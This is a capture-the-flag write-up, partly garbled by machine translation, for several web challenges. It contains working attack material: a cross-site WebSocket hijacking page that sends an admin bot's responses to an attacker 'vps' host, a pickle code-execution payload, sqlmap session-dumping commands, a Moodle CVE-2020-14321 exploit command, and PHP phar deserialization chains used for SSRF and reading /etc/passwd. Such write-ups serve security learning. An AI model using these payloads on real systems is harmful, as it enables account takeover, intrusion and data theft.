强网先锋

rcefile

www.zip下载源码,Visible blacklist filtering.

开启了spl_autoload_register There are no restrictions ,Instantiate one on deserializationtest类的时候,spl_autoload_registerWill automatically go to the current directory containing the file nametest.php 或者是test.inc

上传一个inc,Regenerate deserialized data,最后去config.inc.php包含,执行木马

WEB

babyweb

ws协议通讯,and did not respond to the requestOriginThe header field can be checked similarlyCSRF的CSWSH（Cross-site WebSocket Hijacking）

Take the topicws jsChange it to yourselfvps上 让admin bot去check一下,A connection is established and a request to change the password is sent,After the modification I wrote here, the execution result will be bounced back,vpsJust listen on two ports.

<!DOCTYPE html>
 <meta charset="utf-8" />
 <title>WebSocket Test</title>
 <script language="javascript" type="text/javascript"> var ws = null; var url = "ws://127.0.0.1:8888/bot"; function init() {
       sendtobot(); } function sendtobot() {
       if (ws) {
       var msg = "changepw 123456"; ws.send(msg); } else{
       ws = new WebSocket(url); ws.onopen = function (event) {
       console.log('connection open!') var msg = "changepw 123456"; ws.send(msg); } ws.onmessage = function (ev) {
       botsay(ev.data); }; ws.onerror = function () {
       console.log("connection error"); }; ws.onclose = function () {
       console.log("connection close!"); }; } } function botsay(content) {
       document.location='http://vps:7777?c=bot: ' + content; } function closeWebSocket() {
       if(ws){
       ws.close(); ws = null; } } window.addEventListener("load", init, false); </script>

然后去登录admin账号即可,购买提示,Obtain the download address of the back-end source code.

Negative numbers can be subtractedcost使得money增加

但pythonThe backend is hard-coded and reasonablenum

Use front and backJSON Parsers Differential security issues绕过：

• python标准库中的JSON解析器,For duplicate keys,will return the last key-value pair.

• Golang服务,A high-performance third party is usedJSON解析器（buger/jsonparser),For duplicate keys,It will return the first key-value pair.

Submit a negative value to add money,直接购买flag即可.

crash

OBJ(GLOBAL('builtins', 'exec'), '''c="import admin;admin.s"+"ecret='1'";exec(c)''') 
return

使用pker生成cookie

with malicecookie去访问/balancer修改admin的密码,Then log in normally.

The submission weights are both0,Any address is legal,Just wait for a while and wait for the simulation result to returnflag.

easylogin

https://zhuanlan.zhihu.com/p/471299626

https://cn-sec.com/archives/1206142.html

sqlmap去跑数据

python sqlmap.py -r 2.txt --flush-session --random-agent -D moodle -T mdl_sessions --technique E --columns --batch

userThe password is encrypted,根据https://severalnines.com/blog/using-redis-offload-galera-cluster-session-management-data-moodle/Learn to log insessionwill be put into the databasemdl_sessions表

python sqlmap.py -r 2.txt --flush-session --random-agent -D moodle -T mdl_sessions -C id,sid,userid,sessdata --technique E --batch --dump

Then the login page is replacedcookie值,进入管理员页面.（Use it in practiceuserid为2的sid,写wpWhen there is a problem with the environment）

https://github.com/HoangKien1020/CVE-2020-14321 用这个exp

运行脚本执行命令 或者手动上传zip执行命令

python3 cve202014321.py -url http://47.105.52.19:8888 -cookie=rpu74vh353tiflel5ncdilqka7 -cmd=cat //etc/mytest/flaaaaaaaggggggggggggggggggggg

easyweb

Use pseudo-protocol to read source code,使用demo或者guestAdd to bypass detection where it doesn't affect

/showfile.php?f=php://filter/read=convert.base64-encode/demo/resource=upload.php

利用SESSION_UPLOAD_PROGRESS上传文件

import requests
import io

url = "http://47.104.95.124:8080/upload.php"
f = io.BytesIO(b"t" * 1024 * 50)
r = requests.post(url=url, data={
    "PHP_SESSION_UPLOAD_PROGRESS": "2333"}, files={
    "file": open("fixd_phar.jpg","rb")}, cookies={
    "PHPSESSID": "2333"})
path = r.text.split(" ")[-2].split("/")[-2]

r = requests.get(f"http://47.104.95.124:8080/showfile.php?f=phar:///var/www/html/{
      path}/fixd_phar.jpg/demo.txt",timeout=1)
print(r.text)

pharThe file generation script is as follows：

AdminShow#__wakeup -> GuestShow#__toString -> AdminShow#__get -> AdminShow#show

<?php

    class GuestShow{
    
    public $file;
    public $contents;
    public function __construct($file)
    {
    

        $this->file=$file;
    }
    function __toString(){
    
        $str = $this->file->name;
        return "";
    }
    function __get($value){
    
        return $this->$value;
    }
    function show()
    {
    
        $this->contents = file_get_contents($this->file);
        $src = "data:jpg;base64,".base64_encode($this->contents);
        echo "<img src={
      $src} />";
    }
    function __destruct(){
    
        echo $this;
    }
}


class AdminShow{
    
    public $source;
    public $str;
    public $filter;
    public function __construct($file)
    {
    
        $this->source = $file;
        $this->schema = '';
    }
    public function __toString()
    {
    
        $content = $this->str[0]->source;
        $content = $this->str[1]->schema;
        return $content;
    }
    public function __get($value){
    
        $this->show();
        return $this->$value;
    }
    public function __set($key,$value){
    
        $this->$key = $value;
    }
    public function show(){
    
        if(preg_match('/usr|auto|log/i' , $this->source))
        {
    
            die("error");
        }

        $url = $this->schema . $this->source;
        echo $url;
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $url);
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_HEADER, 1);
        $response = curl_exec($curl);
        curl_close($curl);
        $src = "data:jpg;base64,".base64_encode($response);
        echo "<img src={
      $src} />";

    }
    public function __wakeup()
    {
    
        echo "wakeup";
        if ($this->schema !== 'file:///var/www/html/') {
    
            $this->schema = 'file:///var/www/html/';
        }
        if ($this->source !== 'admin.png') {
    
            $this->source = 'admin.png';
        }
    }
}

$a = new AdminShow('a');
$b = new GuestShow('a');
$c = new AdminShow('file:///etc/passwd');
$b->file = $c;
$a->schema = $b;
echo serialize($a);

$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("demo.txt", "test"); //添加要压缩的文件,随便新建一个文件内容随意
$phar->stopBuffering();
?>

或者直接用GuestShow#__destructThe method can directly trigger its owntoString.

$a = new GuestShow("a");
$b = new AdminShow("file:///etc/passwd");
$a->file=$b;

wakeupThe bypass can be done by using a method with a larger number of properties than the actual one,Add the number of attributes1变成5,或者把schema属性删掉.

The modified files still need to be repairedphar的校验头

# -*- coding: utf-8 -*-
from hashlib import sha1
f = open('phar.jpg', 'rb').read() # 修改内容后的phar文件
s = f[:-28] # 获取要签名的数据
h = f[-8:] # 获取签名类型以及GBMB标识
newf = s+sha1(s).digest()+h # 数据 + 签名 + 类型 + GBMB
open('fixd_phar.jpg', 'wb').write(newf) # 写入新文件

In fact, you don't need to call it so much,因为AdminShownot in classpublic schema属性,It can be directly entered when deserializing__getDo arbitrary overrides while bypassingwakeup

<?php

class AdminShow
{
    
    public $source;
    public $str;
    public $filter;

    public function __construct($file)
    {
    
        $this->source = $file;
    }
}
$a = new AdminShow("file:///etc/passwd");
echo serialize($a);
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>"); //设置stub
$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("demo.txt", "test"); //添加要压缩的文件,随便新建一个文件内容随意
$phar->stopBuffering();

Then upload with the script above,利用AdminShow#show的curl扫内网,The target machine is there10段,然后file协议读flag.